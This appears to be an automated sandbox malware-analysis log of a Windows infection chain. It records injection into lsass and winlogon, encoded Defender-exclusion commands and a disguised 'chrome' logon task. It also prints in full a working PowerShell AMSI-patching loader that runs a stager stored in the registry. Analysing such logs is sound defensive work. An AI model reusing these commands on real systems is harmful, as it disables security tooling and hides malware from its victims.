Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\34432.exe Memory allocated: page read and write | page guard
Source: C:\Windows\System32\nslookup.exe Code function: 22_2_00000001400021B8 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,
Source: C:\Windows\System32\nslookup.exe Code function: 22_2_0000000140002CF4 SetUnhandledExceptionFilter,
Source: C:\Windows\System32\nslookup.exe Code function: 22_2_0000000140005D5C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\nslookup.exe Code function: 22_2_0000000140002B10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\nslookup.exe Code function: 22_2_000000014000235C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\dllhost.exe Code function: 39_2_0000000140002338 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,
Source: C:\Windows\System32\dllhost.exe Code function: 39_2_0000000140002C90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\dllhost.exe Code function: 39_2_00000001400024DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\dllhost.exe Code function: 39_2_000000014000624C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001AFDDD09098 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001AFDDD08450 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001AFDDD0BEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BB8450 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BB9098 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BBBEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D08450 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D09098 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D0BEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF49098 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF48450 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF4BEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionExtension @('exe','dll') -Force
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionExtension @('exe','dll') -Force
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\34432.exeMemory allocated: C:\Windows\System32\nslookup.exe base: 140000000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1AFDDCD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 240B2B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CAF3CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8BFF10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2C633850000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: DDCD35D0
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: B2B835D0
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: F3CD35D0
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: BFF135D0
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4CF1008
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 140000000
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 140001000
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 14000E000
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 140019000
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 14001B000
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 14001C000
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 14001D000
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 140056000
Source: C:\Users\user\AppData\Roaming\34432.exeMemory written: C:\Windows\System32\nslookup.exe base: 44EB131010
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 14000E000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140018000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 14001A000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 14001B000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 14001C000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 14003F000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: EE637B6010
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1AFDDCD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 240B2B80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CAF3CD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8BFF10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2C633850000
Source: 34432.exe.1.dr, u200f????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll')
Source: 2.3.ChiefKeefofficialnaxyi_crypted(6).exe.2670000.0.unpack, u0003u2006.csReference to suspicious API methods: ('\\x02', 'LoadLibrary@kernel32.dll'), ('\\x02', 'GetProcAddress@kernel32.dll')
Source: chrome.exe.4.dr, u200f????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll')
Source: 5.2.AppLaunch.exe.400000.0.unpack, u0003u2006.csReference to suspicious API methods: ('\\x02', 'LoadLibrary@kernel32.dll'), ('\\x02', 'GetProcAddress@kernel32.dll')
Source: C:\Users\user\AppData\Roaming\34432.exeThread register set: target process: 7056
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 2324
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$qKHXRLjxcQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');$qKHXRLjxcQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NibVxWxTFc,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');Write-Output $qKHXRLjxcQb.CreateType();}$uYKrZWxknTiUv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$SpNyfScDlNPPHB=$uYKrZWxknTiUv.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RRmRtbQVOsCwqbtFCRP=oBYZxpoBuJDg @([String])([IntPtr]);$CSrLsWTvUKtnfJeCoYnQHQ=oBYZxpoBuJDg 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LbwxtlPJWDL=$uYKrZWxknTiUv.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$UsbtvKZkuSsHuw=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Load'+'LibraryA')));$GBWVSxTZRtiWMYLEL=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Vir'+'tual'+'Pro'+'tect')));$zcmbglj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UsbtvKZkuSsHuw,$RRmRtbQVOsCwqbtFCRP).Invoke('a'+'m'+'si.dll');$NtWqUAjxRFzIehWzj=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$zcmbglj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$QZnCEHiAlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,4,[ref]$QZnCEHiAlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$NtWqUAjxRFzIehWzj,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,0x20,[ref]$QZnCEHiAlz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JkETjFsAcrF.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');$JkETjFsAcrF.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jXrdWylJno,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');Write-Output $JkETjFsAcrF.CreateType();}$lPmVEIqLxWSBJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$oknnqNPEawtCof=$lPmVEIqLxWSBJ.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PfTqTVeTqNbzEtTZAwA=JcVEStQtPhkP @([String])([IntPtr]);$FBhryrsEcCEQMAYVVFmrjj=JcVEStQtPhkP 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gdWNaSIjpXI=$lPmVEIqLxWSBJ.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$MwCkRVFOfjwTFV=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Load'+'LibraryA')));$PwfBMMcphOddVTLUY=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Vir'+'tual'+'Pro'+'tect')));$FyAgKxj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MwCkRVFOfjwTFV,$PfTqTVeTqNbzEtTZAwA).Invoke('a'+'m'+'si.dll');$GiLFGjttEZsjytHxc=$oknnqNPEawtCof.Invoke($Null,@([Object]$FyAgKxj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$XarcXAurwd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,4,[ref]$XarcXAurwd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GiLFGjttEZsjytHxc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,0x20,[ref]$XarcXAurwd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exe
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{bb7b2400-d282-40c3-8b5b-9f36c353d0f9}
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe"
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Chrome\chrome.exe C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
